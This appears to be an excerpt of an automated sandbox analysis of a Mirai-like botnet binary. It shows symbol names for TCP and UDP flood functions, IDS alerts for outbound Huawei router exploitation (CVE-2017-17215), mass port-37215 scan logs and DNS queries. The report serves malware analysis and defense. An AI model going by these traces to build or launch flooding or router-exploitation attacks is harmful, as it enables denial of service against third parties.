                  __libc_sendto.symtab0x11e58136FUNC<unknown>DEFAULT2
                  __libc_setup_tls.symtab0x19350560FUNC<unknown>DEFAULT2
                  __libc_sigaction.symtab0x15a18136FUNC<unknown>DEFAULT2
                  __libc_stack_end.symtab0x268cc4OBJECT<unknown>DEFAULT14
                  __libc_system.symtab0x158ec132FUNC<unknown>DEFAULT2
                  __libc_waitpid.symtab0x16020124FUNC<unknown>DEFAULT2
                  __libc_write.symtab0x14a90100FUNC<unknown>DEFAULT2
                  __lll_lock_wait_private.symtab0x14648152FUNC<unknown>HIDDEN2
                  __ltdf2.symtab0x1a958140FUNC<unknown>HIDDEN2
                  __malloc_consolidate.symtab0x12ecc436FUNC<unknown>HIDDEN2
                  __malloc_largebin_index.symtab0x11f6c120FUNC<unknown>DEFAULT2
                  __malloc_lock.symtab0x260d424OBJECT<unknown>DEFAULT13
                  __malloc_state.symtab0x28f3c888OBJECT<unknown>DEFAULT14
                  __malloc_trim.symtab0x12e1c176FUNC<unknown>DEFAULT2
                  __muldf3.symtab0x1a4b4656FUNC<unknown>HIDDEN2
                  __nedf2.symtab0x1a960132FUNC<unknown>HIDDEN2
                  __nptl_deallocate_tsd.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                  __nptl_nthreads.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                  __open.symtab0x14a00100FUNC<unknown>DEFAULT2
                  __open_nocancel.symtab0x149e424FUNC<unknown>DEFAULT2
                  __pagesize.symtab0x268d44OBJECT<unknown>DEFAULT14
                  __preinit_array_end.symtab0x260040NOTYPE<unknown>HIDDEN8
                  __preinit_array_start.symtab0x260040NOTYPE<unknown>HIDDEN8
                  __progname.symtab0x261cc4OBJECT<unknown>DEFAULT13
                  __progname_full.symtab0x261d04OBJECT<unknown>DEFAULT13
                  __pthread_initialize_minimal.symtab0x1958012FUNC<unknown>DEFAULT2
                  __pthread_mutex_init.symtab0x14cfc8FUNC<unknown>DEFAULT2
                  __pthread_mutex_lock.symtab0x14cf48FUNC<unknown>DEFAULT2
                  __pthread_mutex_trylock.symtab0x14cf48FUNC<unknown>DEFAULT2
                  __pthread_mutex_unlock.symtab0x14cf48FUNC<unknown>DEFAULT2
                  __pthread_return_0.symtab0x14cf48FUNC<unknown>DEFAULT2
                  __pthread_unwind.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                  __read.symtab0x14b20100FUNC<unknown>DEFAULT2
                  __read_nocancel.symtab0x14b0424FUNC<unknown>DEFAULT2
                  __register_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                  __restore_core_regs.symtab0x1b7a028FUNC<unknown>HIDDEN2
                  __rtld_fini.symtab0x268dc4OBJECT<unknown>HIDDEN14
                  __sigjmp_save.symtab0x19ea464FUNC<unknown>HIDDEN2
                  __sigsetjmp.symtab0x1967412FUNC<unknown>DEFAULT2
                  __stdin.symtab0x261ec4OBJECT<unknown>DEFAULT13
                  __stdio_READ.symtab0x19ac488FUNC<unknown>HIDDEN2
                  __stdio_WRITE.symtab0x19b1c220FUNC<unknown>HIDDEN2
                  __stdio_adjust_position.symtab0x19bf8200FUNC<unknown>HIDDEN2
                  __stdio_fwrite.symtab0x16e10320FUNC<unknown>HIDDEN2
                  __stdio_rfill.symtab0x19cc048FUNC<unknown>HIDDEN2
                  __stdio_seek.symtab0x19d9460FUNC<unknown>HIDDEN2
                  __stdio_trans2r_o.symtab0x19cf0164FUNC<unknown>HIDDEN2
                  __stdio_trans2w_o.symtab0x17134220FUNC<unknown>HIDDEN2
                  __stdio_wcommit.symtab0x1721048FUNC<unknown>HIDDEN2
                  __stdout.symtab0x261f04OBJECT<unknown>DEFAULT13
                  __subdf3.symtab0x1a0a0788FUNC<unknown>HIDDEN2
                  __sys_accept.symtab0x1195468FUNC<unknown>DEFAULT2
                  __sys_connect.symtab0x11a5068FUNC<unknown>DEFAULT2
                  __sys_recv.symtab0x11bd468FUNC<unknown>DEFAULT2
                  __sys_recvfrom.symtab0x11c8872FUNC<unknown>DEFAULT2
                  __sys_send.symtab0x11d5868FUNC<unknown>DEFAULT2
                  __sys_sendto.symtab0x11e0c76FUNC<unknown>DEFAULT2
                  __syscall_error.symtab0x159ec44FUNC<unknown>HIDDEN2
                  __syscall_error.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  __syscall_fcntl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  __syscall_nanosleep.symtab0x15df464FUNC<unknown>DEFAULT2
                  __syscall_rt_sigaction.symtab0x15ad064FUNC<unknown>DEFAULT2
                  __syscall_rt_sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  __syscall_select.symtab0xfac068FUNC<unknown>DEFAULT2
                  __tls_get_addr.symtab0x1932c36FUNC<unknown>DEFAULT2
                  __uClibc_fini.symtab0x14d38124FUNC<unknown>DEFAULT2
                  __uClibc_init.symtab0x14e0888FUNC<unknown>DEFAULT2
                  __uClibc_main.symtab0x14e601004FUNC<unknown>DEFAULT2
                  __uClibc_main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  __uclibc_progname.symtab0x261c84OBJECT<unknown>HIDDEN13
                  __udivsi3.symtab0xf714252FUNC<unknown>HIDDEN2
                  __write.symtab0x14a90100FUNC<unknown>DEFAULT2
                  __write_nocancel.symtab0x14a7424FUNC<unknown>DEFAULT2
                  __xpg_strerror_r.symtab0x117f0268FUNC<unknown>DEFAULT2
                  __xpg_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  __xstat32_conv.symtab0xfd28172FUNC<unknown>HIDDEN2
                  __xstat64_conv.symtab0xfc5c204FUNC<unknown>HIDDEN2
                  _adjust_pos.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _bss_custom_printf_spec.symtab0x2636c10OBJECT<unknown>DEFAULT14
                  _bss_end__.symtab0x292e80NOTYPE<unknown>DEFAULTSHN_ABS
                  _charpad.symtab0x103cc84FUNC<unknown>DEFAULT2
                  _cs_funcs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _custom_printf_arginfo.symtab0x28eec40OBJECT<unknown>HIDDEN14
                  _custom_printf_handler.symtab0x28f1440OBJECT<unknown>HIDDEN14
                  _custom_printf_spec.symtab0x260d04OBJECT<unknown>HIDDEN13
                  _dl_aux_init.symtab0x1958c56FUNC<unknown>DEFAULT2
                  _dl_nothread_init_static_tls.symtab0x195c488FUNC<unknown>HIDDEN2
                  _dl_phdr.symtab0x292e04OBJECT<unknown>DEFAULT14
                  _dl_phnum.symtab0x292e44OBJECT<unknown>DEFAULT14
                  _dl_tls_dtv_gaps.symtab0x292d41OBJECT<unknown>DEFAULT14
                  _dl_tls_dtv_slotinfo_list.symtab0x292d04OBJECT<unknown>DEFAULT14
                  _dl_tls_generation.symtab0x292d84OBJECT<unknown>DEFAULT14
                  _dl_tls_max_dtv_idx.symtab0x292c84OBJECT<unknown>DEFAULT14
                  _dl_tls_setup.symtab0x192c4104FUNC<unknown>DEFAULT2
                  _dl_tls_static_align.symtab0x292c44OBJECT<unknown>DEFAULT14
                  _dl_tls_static_nelem.symtab0x292dc4OBJECT<unknown>DEFAULT14
                  _dl_tls_static_size.symtab0x292cc4OBJECT<unknown>DEFAULT14
                  _dl_tls_static_used.symtab0x292c04OBJECT<unknown>DEFAULT14
                  _edata.symtab0x262c40NOTYPE<unknown>DEFAULTSHN_ABS
                  _end.symtab0x292e80NOTYPE<unknown>DEFAULTSHN_ABS
                  _exit.symtab0xf9c8104FUNC<unknown>DEFAULT2
                  _exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _fini.symtab0x1c0300FUNC<unknown>DEFAULT3
                  _fixed_buffers.symtab0x269308192OBJECT<unknown>DEFAULT14
                  _fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _fp_out_narrow.symtab0x10420132FUNC<unknown>DEFAULT2
                  _fpmaxtostr.symtab0x1743c2036FUNC<unknown>HIDDEN2
                  _fpmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _fwrite.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _init.symtab0x80d40FUNC<unknown>DEFAULT1
                  _load_inttype.symtab0x17240116FUNC<unknown>HIDDEN2
                  _load_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _memcpy.symtab0x186c00FUNC<unknown>HIDDEN2
                  _ppfs_init.symtab0x10b98160FUNC<unknown>HIDDEN2
                  _ppfs_init.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _ppfs_parsespec.symtab0x10e801392FUNC<unknown>HIDDEN2
                  _ppfs_parsespec.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _ppfs_prepargs.symtab0x10c3868FUNC<unknown>HIDDEN2
                  _ppfs_prepargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _ppfs_setargs.symtab0x10c7c432FUNC<unknown>HIDDEN2
                  _ppfs_setargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _promoted_size.symtab0x10e2c84FUNC<unknown>DEFAULT2
                  _pthread_cleanup_pop_restore.symtab0x14d0c44FUNC<unknown>DEFAULT2
                  _pthread_cleanup_push_defer.symtab0x14d048FUNC<unknown>DEFAULT2
                  _rfill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _setjmp.symtab0x15aa08FUNC<unknown>DEFAULT2
                  _start.symtab0x81940FUNC<unknown>DEFAULT2
                  _stdio.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _stdio_fopen.symtab0x169b01120FUNC<unknown>HIDDEN2
                  _stdio_init.symtab0x16f50128FUNC<unknown>HIDDEN2
                  _stdio_openlist.symtab0x261f44OBJECT<unknown>DEFAULT13
                  _stdio_openlist_add_lock.symtab0x2691012OBJECT<unknown>DEFAULT14
                  _stdio_openlist_dec_use.symtab0x17e90688FUNC<unknown>HIDDEN2
                  _stdio_openlist_del_count.symtab0x2692c4OBJECT<unknown>DEFAULT14
                  _stdio_openlist_del_lock.symtab0x2691c12OBJECT<unknown>DEFAULT14
                  _stdio_openlist_use_count.symtab0x269284OBJECT<unknown>DEFAULT14
                  _stdio_streams.symtab0x261f8204OBJECT<unknown>DEFAULT13
                  _stdio_term.symtab0x16fd0356FUNC<unknown>HIDDEN2
                  _stdio_user_locking.symtab0x261dc4OBJECT<unknown>DEFAULT13
                  _store_inttype.symtab0x172b444FUNC<unknown>HIDDEN2
                  _store_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _string_syserrmsgs.symtab0x1cf382906OBJECT<unknown>HIDDEN4
                  _string_syserrmsgs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _trans2r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _trans2w.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _uintmaxtostr.symtab0x172e0348FUNC<unknown>HIDDEN2
                  _uintmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _vfprintf_internal.symtab0x104a41780FUNC<unknown>HIDDEN2
                  _vfprintf_internal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _wcommit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  abort.symtab0x132fc296FUNC<unknown>DEFAULT2
                  abort.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  accept.symtab0x11998116FUNC<unknown>DEFAULT2
                  accept.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  arch_names.symtab0x1cd8432OBJECT<unknown>DEFAULT4
                  attack.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  attack_get_opt_int.symtab0x86ac112FUNC<unknown>DEFAULT2
                  attack_get_opt_ip.symtab0x8640108FUNC<unknown>DEFAULT2
                  attack_init.symtab0x871c908FUNC<unknown>DEFAULT2
                  attack_kill_all.symtab0x82cc344FUNC<unknown>DEFAULT2
                  attack_method_nudp.symtab0xc1bc1668FUNC<unknown>DEFAULT2
                  attack_method_stdhex.symtab0xbedc736FUNC<unknown>DEFAULT2
                  attack_method_tcp.symtab0x91701708FUNC<unknown>DEFAULT2
                  attack_ongoing.symtab0x262e832OBJECT<unknown>DEFAULT14
                  attack_parse.symtab0x8424540FUNC<unknown>DEFAULT2
                  attack_start.symtab0x81d0252FUNC<unknown>DEFAULT2
                  attack_tcp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  attack_tcp_ack.symtab0xa6c81788FUNC<unknown>DEFAULT2
                  attack_tcp_null.symtab0xb49c1948FUNC<unknown>DEFAULT2
                  attack_tcp_sack2.symtab0x981c1776FUNC<unknown>DEFAULT2
                  attack_tcp_stomp.symtab0x9f0c1980FUNC<unknown>DEFAULT2
                  attack_tcp_syn.symtab0x8aa81736FUNC<unknown>DEFAULT2
                  attack_tcp_syndata.symtab0xadc41752FUNC<unknown>DEFAULT2
                  attack_udp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  attack_udp_plain.symtab0xbc3c672FUNC<unknown>DEFAULT2
                  been_there_done_that.symtab0x2637c4OBJECT<unknown>DEFAULT14
                  bind.symtab0x11a0c68FUNC<unknown>DEFAULT2
                  bind.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  brk.symtab0x1961c88FUNC<unknown>DEFAULT2
                  brk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  calloc.symtab0x1291c320FUNC<unknown>DEFAULT2
                  calloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  cancel_handler.symtab0x1524c340FUNC<unknown>DEFAULT2
                  checksum.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  checksum_generic.symtab0xc84080FUNC<unknown>DEFAULT2
                  checksum_tcpudp.symtab0xc890164FUNC<unknown>DEFAULT2
                  clock.symtab0x1023052FUNC<unknown>DEFAULT2
                  clock.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  close.symtab0x14970100FUNC<unknown>DEFAULT2
                  closedir.symtab0xfdd4272FUNC<unknown>DEFAULT2
                  closedir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  completed.5105.symtab0x262c41OBJECT<unknown>DEFAULT14
                  conn_table.symtab0x2633c4OBJECT<unknown>DEFAULT14
                  connect.symtab0x11a94116FUNC<unknown>DEFAULT2
                  connect.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  dl-support.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  do_system.symtab0x153a01356FUNC<unknown>DEFAULT2
                  entries.symtab0x28e9c4OBJECT<unknown>DEFAULT14
                  environ.symtab0x268d04OBJECT<unknown>DEFAULT14
                  errno.symtab0x04TLS<unknown>DEFAULT8
                  errno.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  execve.symtab0x15b1064FUNC<unknown>DEFAULT2
                  execve.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  exit.symtab0x13a48196FUNC<unknown>DEFAULT2
                  exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  exp10_table.symtab0x1de8072OBJECT<unknown>DEFAULT4
                  fclose.symtab0x16660816FUNC<unknown>DEFAULT2
                  fclose.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  fcntl.symtab0xf8d4244FUNC<unknown>DEFAULT2
                  fd_ctrl.symtab0x260c04OBJECT<unknown>DEFAULT13
                  fd_serv.symtab0x260c44OBJECT<unknown>DEFAULT13
                  fd_to_DIR.symtab0xfee4208FUNC<unknown>DEFAULT2
                  fdopendir.symtab0x10078176FUNC<unknown>DEFAULT2
                  fflush_unlocked.symtab0x18140940FUNC<unknown>DEFAULT2
                  fflush_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  fgetc.symtab0x17c30324FUNC<unknown>DEFAULT2
                  fgetc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  fgetc_unlocked.symtab0x184ec300FUNC<unknown>DEFAULT2
                  fgetc_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  fgets.symtab0x17d74284FUNC<unknown>DEFAULT2
                  fgets.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  fgets_unlocked.symtab0x18618160FUNC<unknown>DEFAULT2
                  fgets_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  first_connect.symtab0x263444OBJECT<unknown>DEFAULT14
                  fmt.symtab0x1de6820OBJECT<unknown>DEFAULT4
                  fopen.symtab0x1699032FUNC<unknown>DEFAULT2
                  fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  192.168.2.23197.39.107.16136752372152835222 03/20/23-17:47:11.547445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3675237215192.168.2.23197.39.107.161
                  192.168.2.2341.237.23.22647280372152835222 03/20/23-17:48:58.233356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4728037215192.168.2.2341.237.23.226
                  192.168.2.23211.35.61.2738110372152835222 03/20/23-17:48:12.959548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3811037215192.168.2.23211.35.61.27
                  192.168.2.23202.108.169.15353818372152835222 03/20/23-17:48:12.885568TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5381837215192.168.2.23202.108.169.153
                  192.168.2.2335.190.101.6838784372152835222 03/20/23-17:46:58.246045TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3878437215192.168.2.2335.190.101.68
                  192.168.2.23147.46.86.1455690372152835222 03/20/23-17:47:22.978510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5569037215192.168.2.23147.46.86.14
                  TimestampSource PortDest PortSource IPDest IP
                  Mar 20, 2023 17:46:56.838798046 CET42836443192.168.2.2391.189.91.43
                  Mar 20, 2023 17:46:57.197160006 CET253237215192.168.2.23172.48.71.199
                  Mar 20, 2023 17:46:57.197160006 CET253237215192.168.2.23157.140.61.123
                  Mar 20, 2023 17:46:57.197169065 CET253237215192.168.2.23197.240.88.160
                  Mar 20, 2023 17:46:57.197189093 CET253237215192.168.2.2341.19.172.198
                  Mar 20, 2023 17:46:57.197191954 CET253237215192.168.2.2341.23.197.218
                  Mar 20, 2023 17:46:57.197316885 CET253237215192.168.2.23157.20.100.157
                  Mar 20, 2023 17:46:57.197321892 CET253237215192.168.2.23157.206.94.17
                  Mar 20, 2023 17:46:57.197340965 CET253237215192.168.2.2341.226.233.136
                  Mar 20, 2023 17:46:57.197371960 CET253237215192.168.2.23157.127.3.23
                  Mar 20, 2023 17:46:57.197391987 CET253237215192.168.2.23197.121.254.179
                  Mar 20, 2023 17:46:57.197438002 CET253237215192.168.2.23157.74.250.109
                  Mar 20, 2023 17:46:57.197465897 CET253237215192.168.2.23197.40.73.153
                  Mar 20, 2023 17:46:57.197489023 CET253237215192.168.2.23134.83.64.211
                  Mar 20, 2023 17:46:57.197509050 CET253237215192.168.2.2341.83.16.170
                  Mar 20, 2023 17:46:57.197546959 CET253237215192.168.2.23197.203.101.217
                  Mar 20, 2023 17:46:57.197642088 CET253237215192.168.2.23197.243.32.149
                  Mar 20, 2023 17:46:57.197711945 CET253237215192.168.2.2348.254.205.245
                  Mar 20, 2023 17:46:57.197813034 CET253237215192.168.2.2341.186.63.207
                  Mar 20, 2023 17:46:57.197891951 CET253237215192.168.2.23197.102.3.100
                  Mar 20, 2023 17:46:57.197891951 CET253237215192.168.2.2378.88.48.25
                  Mar 20, 2023 17:46:57.197902918 CET253237215192.168.2.23182.182.121.123
                  Mar 20, 2023 17:46:57.197902918 CET253237215192.168.2.23157.179.102.31
                  Mar 20, 2023 17:46:57.197961092 CET253237215192.168.2.23101.184.84.152
                  Mar 20, 2023 17:46:57.198075056 CET253237215192.168.2.23197.131.244.6
                  Mar 20, 2023 17:46:57.198080063 CET253237215192.168.2.23197.32.103.147
                  Mar 20, 2023 17:46:57.198080063 CET253237215192.168.2.2341.120.24.170
                  Mar 20, 2023 17:46:57.198081017 CET253237215192.168.2.2341.122.188.124
                  Mar 20, 2023 17:46:57.198123932 CET253237215192.168.2.2341.90.65.156
                  Mar 20, 2023 17:46:57.198132038 CET253237215192.168.2.2341.106.165.108
                  Mar 20, 2023 17:46:57.198168039 CET253237215192.168.2.239.177.81.147
                  Mar 20, 2023 17:46:57.198194027 CET253237215192.168.2.2341.21.10.181
                  Mar 20, 2023 17:46:57.198194027 CET253237215192.168.2.23102.254.17.249
                  Mar 20, 2023 17:46:57.198199987 CET253237215192.168.2.2351.63.195.100
                  Mar 20, 2023 17:46:57.198221922 CET253237215192.168.2.23157.220.141.106
                  Mar 20, 2023 17:46:57.198528051 CET253237215192.168.2.23197.36.48.54
                  Mar 20, 2023 17:46:57.198550940 CET253237215192.168.2.23157.108.157.134
                  Mar 20, 2023 17:46:57.198647976 CET253237215192.168.2.2341.232.191.100
                  Mar 20, 2023 17:46:57.198697090 CET253237215192.168.2.2341.144.194.128
                  Mar 20, 2023 17:46:57.198719978 CET253237215192.168.2.23157.81.21.130
                  Mar 20, 2023 17:46:57.198734999 CET253237215192.168.2.23157.220.136.16
                  Mar 20, 2023 17:46:57.198746920 CET253237215192.168.2.2341.107.127.238
                  Mar 20, 2023 17:46:57.198796988 CET253237215192.168.2.2341.114.202.144
                  Mar 20, 2023 17:46:57.198821068 CET253237215192.168.2.2351.251.230.240
                  Mar 20, 2023 17:46:57.198868990 CET253237215192.168.2.23197.88.254.0
                  Mar 20, 2023 17:46:57.198952913 CET253237215192.168.2.23168.100.76.1
                  Mar 20, 2023 17:46:57.198952913 CET253237215192.168.2.2348.161.11.245
                  Mar 20, 2023 17:46:57.198980093 CET253237215192.168.2.2341.12.122.129
                  Mar 20, 2023 17:46:57.199019909 CET253237215192.168.2.23197.70.12.236
                  Mar 20, 2023 17:46:57.199062109 CET253237215192.168.2.23121.221.89.180
                  Mar 20, 2023 17:46:57.199062109 CET253237215192.168.2.23197.145.28.44
                  Mar 20, 2023 17:46:57.199062109 CET253237215192.168.2.23157.153.92.217
                  Mar 20, 2023 17:46:57.199068069 CET253237215192.168.2.23120.223.16.236
                  Mar 20, 2023 17:46:57.199095011 CET253237215192.168.2.23157.76.23.247
                  Mar 20, 2023 17:46:57.199368000 CET253237215192.168.2.2341.152.191.139
                  Mar 20, 2023 17:46:57.199425936 CET253237215192.168.2.23197.237.255.94
                  Mar 20, 2023 17:46:57.199431896 CET253237215192.168.2.23157.60.207.8
                  Mar 20, 2023 17:46:57.199547052 CET253237215192.168.2.2341.18.43.116
                  Mar 20, 2023 17:46:57.199603081 CET253237215192.168.2.2341.153.143.169
                  Mar 20, 2023 17:46:57.199650049 CET253237215192.168.2.23197.173.32.192
                  Mar 20, 2023 17:46:57.199657917 CET253237215192.168.2.2341.61.136.137
                  Mar 20, 2023 17:46:57.199686050 CET253237215192.168.2.23157.114.102.122
                  Mar 20, 2023 17:46:57.199686050 CET253237215192.168.2.2341.0.126.142
                  Mar 20, 2023 17:46:57.199697018 CET253237215192.168.2.2341.218.87.25
                  Mar 20, 2023 17:46:57.199698925 CET253237215192.168.2.2341.68.222.44
                  Mar 20, 2023 17:46:57.199723959 CET253237215192.168.2.2357.132.232.76
                  Mar 20, 2023 17:46:57.199852943 CET253237215192.168.2.23197.251.254.111
                  Mar 20, 2023 17:46:57.199862003 CET253237215192.168.2.23157.166.234.187
                  Mar 20, 2023 17:46:57.199882030 CET253237215192.168.2.2398.180.206.143
                  Mar 20, 2023 17:46:57.199906111 CET253237215192.168.2.2325.56.69.168
                  Mar 20, 2023 17:46:57.199938059 CET253237215192.168.2.23197.81.145.35
                  Mar 20, 2023 17:46:57.200520039 CET253237215192.168.2.23197.246.182.250
                  Mar 20, 2023 17:46:57.200553894 CET253237215192.168.2.2341.117.36.207
                  Mar 20, 2023 17:46:57.200576067 CET253237215192.168.2.2398.178.43.202
                  Mar 20, 2023 17:46:57.200609922 CET253237215192.168.2.2341.79.4.101
                  Mar 20, 2023 17:46:57.200825930 CET253237215192.168.2.23197.210.143.5
                  Mar 20, 2023 17:46:57.200865984 CET253237215192.168.2.2341.35.210.146
                  Mar 20, 2023 17:46:57.200927973 CET253237215192.168.2.2341.29.220.168
                  Mar 20, 2023 17:46:57.200989962 CET253237215192.168.2.23197.200.80.52
                  Mar 20, 2023 17:46:57.201004982 CET253237215192.168.2.2341.95.111.135
                  Mar 20, 2023 17:46:57.201052904 CET253237215192.168.2.23197.124.201.189
                  Mar 20, 2023 17:46:57.201073885 CET253237215192.168.2.23177.139.13.182
                  Mar 20, 2023 17:46:57.201106071 CET253237215192.168.2.23197.131.232.61
                  Mar 20, 2023 17:46:57.201117039 CET253237215192.168.2.23197.164.182.169
                  Mar 20, 2023 17:46:57.201199055 CET253237215192.168.2.23157.122.126.189
                  Mar 20, 2023 17:46:57.201219082 CET253237215192.168.2.23150.113.120.248
                  Mar 20, 2023 17:46:57.201263905 CET253237215192.168.2.23157.254.203.47
                  Mar 20, 2023 17:46:57.201287985 CET253237215192.168.2.23157.195.48.89
                  Mar 20, 2023 17:46:57.201297998 CET253237215192.168.2.2341.2.106.165
                  Mar 20, 2023 17:46:57.201343060 CET253237215192.168.2.23197.212.39.117
                  Mar 20, 2023 17:46:57.201343060 CET253237215192.168.2.23197.17.61.84
                  Mar 20, 2023 17:46:57.201363087 CET253237215192.168.2.23197.108.177.178
                  Mar 20, 2023 17:46:57.201457977 CET253237215192.168.2.2340.96.192.34
                  Mar 20, 2023 17:46:57.201482058 CET253237215192.168.2.23197.116.196.199
                  Mar 20, 2023 17:46:57.201493025 CET253237215192.168.2.2341.81.93.183
                  Mar 20, 2023 17:46:57.201512098 CET253237215192.168.2.23157.219.152.209
                  Mar 20, 2023 17:46:57.201553106 CET253237215192.168.2.2393.116.1.245
                  Mar 20, 2023 17:46:57.201590061 CET253237215192.168.2.2363.185.232.143
                  Mar 20, 2023 17:46:57.201742887 CET253237215192.168.2.2341.87.46.180
                  Mar 20, 2023 17:46:57.201781034 CET253237215192.168.2.23157.146.127.21
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Mar 20, 2023 17:46:57.182296991 CET192.168.2.238.8.8.80x34a6Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:46:57.200526953 CET192.168.2.238.8.8.80x34a6Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:46:57.220632076 CET192.168.2.238.8.8.80x34a6Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:46:57.240621090 CET192.168.2.238.8.8.80x34a6Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:46:57.260588884 CET192.168.2.238.8.8.80x34a6Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:00.279623032 CET192.168.2.238.8.8.80x1e65Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:00.299720049 CET192.168.2.238.8.8.80x1e65Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:00.318187952 CET192.168.2.238.8.8.80x1e65Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:00.336684942 CET192.168.2.238.8.8.80x1e65Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:00.357258081 CET192.168.2.238.8.8.80x1e65Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:08.377738953 CET192.168.2.238.8.8.80x5212Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:08.402264118 CET192.168.2.238.8.8.80x5212Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:08.422425032 CET192.168.2.238.8.8.80x5212Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:08.440953970 CET192.168.2.238.8.8.80x5212Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:08.461072922 CET192.168.2.238.8.8.80x5212Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:11.481190920 CET192.168.2.238.8.8.80x5bfbStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:11.501657009 CET192.168.2.238.8.8.80x5bfbStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:11.519925117 CET192.168.2.238.8.8.80x5bfbStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:11.540189981 CET192.168.2.238.8.8.80x5bfbStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:11.558625937 CET192.168.2.238.8.8.80x5bfbStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:17.576850891 CET192.168.2.238.8.8.80x36daStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:17.597343922 CET192.168.2.238.8.8.80x36daStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:17.615499973 CET192.168.2.238.8.8.80x36daStandard query (0)BC@^]BA (IP address)IN (0x0001)false
